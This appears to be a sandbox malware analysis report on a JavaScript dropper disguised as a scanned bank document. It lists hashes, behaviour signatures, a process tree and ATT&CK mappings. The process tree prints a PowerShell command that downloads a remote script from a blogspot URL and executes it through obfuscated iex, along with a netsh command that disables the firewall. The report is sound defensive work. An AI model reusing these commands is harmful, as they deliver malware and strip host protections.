Overview

overview

10

Static

static

1

New_ScanDo...ice.js

windows7-x64

7

New_ScanDo...ice.js

windows10-1703-x64

10

New_ScanDo...ice.js

windows10-2004-x64

10

New_ScanDo...ice.js

windows11-21h2-x64

10

Resubmissions

16-01-2024 10:45

240116-mtr1naaaeq 10

16-01-2024 10:39

240116-mpymmshhgp 10

Analysis

  • max time kernel
    290s
  • max time network
    300s
  • platform
    windows10-1703_x64
  • resource
    win10-20231215-en
  • resource tags

    arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system
  • submitted
    16-01-2024 10:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New_ScanDoc#092387CHASEeAdvice.js

  • Size

    1.4MB

  • MD5

    286d534eb759c671fa9e79cfafd3bc85

  • SHA1

    d165938c1c607618c5cb6d9d11cf5b371f007ac7

  • SHA256

    77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b

  • SHA512

    3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b

  • SSDEEP

    192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD

Score
10/10
evasionpersistencetrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
    evasion
  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
      2⤵
      • UAC bypass
      • Blocklisted process makes network request
      • Registers COM server for autorun
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2196
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c5suvrj0\c5suvrj0.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2964
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7FCF.tmp" "c:\Users\Admin\AppData\Local\Temp\c5suvrj0\CSC46BEA21AFB854ECAA21C937E3F6D1B75.TMP"
          4⤵
            PID:1768
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
          3⤵
          • Modifies Windows Firewall
          PID:3332
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4688
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:752
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 708
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2388
        • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:756
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
            dw20.exe -x -s 692
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3372

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Persistence

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    2
    T1547

    Registry Run Keys / Startup Folder

    2
    T1547.001

    Create or Modify System Process

    1
    T1543

    Windows Service

    1
    T1543.003

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Command and Control

    Web Service

    1
    T1102

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES7FCF.tmp
      Filesize

      1KB

      MD5

      e431c0b42b0f38f514869886df65a3fc

      SHA1

      fa72fb12e092563697ea45c7f3f283f3f811d894

      SHA256

      4b8556874c35b9bf7d8dba698b0edbcc1af4ebe5ba001837545a6666e4d22ce2

      SHA512

      cd3d874293ffdbd1a43328a4d650d02d1e94797fecbb4fa19624a57e24170e945ad4e265ca4306911b553be570cdbd0a1f3fa17c0dd4a6ea5566c75580cf6046

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nqrjfnhz.z1z.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\c5suvrj0\c5suvrj0.dll
      Filesize

      3KB

      MD5

      8989c5e3ade9ade9e4807db91296c5b1

      SHA1

      e697809f722479d6a9ae9f21ab63c1858830fc59

      SHA256

      36565ac7aac6267d69885c606e3cfd2149c2b7bc57f217e0c687867ba131006d

      SHA512

      382eb992b2092ce83242b63c0d51a6cbb9218a45363e80f69b15dcd43c1ed9bc208e07447f29d7df3d17f3125d52e3cbe05f54d4b351dc5e2bce7b67752d21c3

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\c5suvrj0\CSC46BEA21AFB854ECAA21C937E3F6D1B75.TMP
      Filesize

      652B

      MD5

      916597f2fcf850f41c61947adc81f1f3

      SHA1

      0a37d3c94bd94f4d2177d22f88d74dc05a4dcbb1

      SHA256

      036de56932dbad4712a99eb22f4d5e8337b0c362bc845a57439d89c7dc238921

      SHA512

      c41068edb0e67aaf268ce1d08dafd2176ef0114431444c1e3e214504c023866ef95f629138e4c6a4cff529a411832620a7399e667b206c2c55f7a7804c5cbe1a

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\c5suvrj0\c5suvrj0.0.cs
      Filesize

      870B

      MD5

      e06ebf853695db38aaac82c9af297ae4

      SHA1

      ef98bacec5ac2ae3bf24aac8ed56935a25c1f064

      SHA256

      79c1099bad1dccb1d151887071b8e8b5d679de343903895fa28e45b791cae344

      SHA512

      036449d932066d506a6bd7c08df311bf1ed5e7b3595004941fe1c39a8e9f9b0d08d43b33a180d4851f88d49c98a17b05cf5235858ada611306fc602cfd582759

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\c5suvrj0\c5suvrj0.cmdline
      Filesize

      369B

      MD5

      1125f91ed30b79209277636c3ae8c18c

      SHA1

      c63a375b7f7a391f28ad7bfbe069a8a4b4883ec6

      SHA256

      636b41248f090a43866fbdeacb92d06a1547f375eef217a7bec3fbdec08672af

      SHA512

      8f0747dddf899c7108c8e49258f140c1fa3ba434e679975ca676e20f368d37e381774893c2283189e9597b209d688cd1c65238074be2d68a62f843aae3baeff6

      Download Submit

    • memory/752-239-0x000000006F9B0000-0x000000006FF60000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/752-173-0x000000006F9B0000-0x000000006FF60000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/752-171-0x000000006F9B0000-0x000000006FF60000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/752-172-0x0000000002B00000-0x0000000002B10000-memory.dmp

      Filesize

      64KB

      Download

    • memory/756-185-0x000000006F9B0000-0x000000006FF60000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/756-187-0x0000000000930000-0x0000000000940000-memory.dmp

      Filesize

      64KB

      Download

    • memory/756-240-0x000000006F9B0000-0x000000006FF60000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/756-241-0x0000000000930000-0x0000000000940000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-55-0x0000024FAE160000-0x0000024FAE168000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2196-236-0x00007FFA08380000-0x00007FFA08D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2196-155-0x0000024F95B10000-0x0000024F95B1E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/2196-156-0x0000024F95B50000-0x0000024F95B6A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2196-7-0x00007FFA08380000-0x00007FFA08D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2196-158-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-9-0x0000024FAE430000-0x0000024FAE4A6000-memory.dmp

      Filesize

      472KB

      Download

    • memory/2196-8-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-154-0x00007FFA08380000-0x00007FFA08D6C000-memory.dmp

      Filesize

      9.9MB

      Download

    • memory/2196-4-0x0000024FAE170000-0x0000024FAE192000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2196-10-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-163-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-21-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-183-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-30-0x0000024FAEC70000-0x0000024FAEE32000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/2196-41-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2196-170-0x0000024FAE1A0000-0x0000024FAE1B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4688-161-0x00000000054B0000-0x00000000059AE000-memory.dmp

      Filesize

      5.0MB

      Download

    • memory/4688-165-0x00000000051B0000-0x000000000524C000-memory.dmp

      Filesize

      624KB

      Download

    • memory/4688-168-0x0000000005B80000-0x0000000005D42000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/4688-166-0x0000000005250000-0x00000000052E2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/4688-167-0x0000000005090000-0x00000000050E0000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4688-164-0x00000000051A0000-0x00000000051B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4688-232-0x00000000068A0000-0x00000000068AA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4688-162-0x0000000005020000-0x0000000005086000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4688-237-0x0000000073500000-0x0000000073BEE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4688-238-0x00000000051A0000-0x00000000051B0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4688-159-0x0000000000B00000-0x0000000000B8C000-memory.dmp

      Filesize

      560KB

      Download

    • memory/4688-160-0x0000000073500000-0x0000000073BEE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4688-157-0x0000000000400000-0x000000000048C000-memory.dmp

      Filesize

      560KB

      Download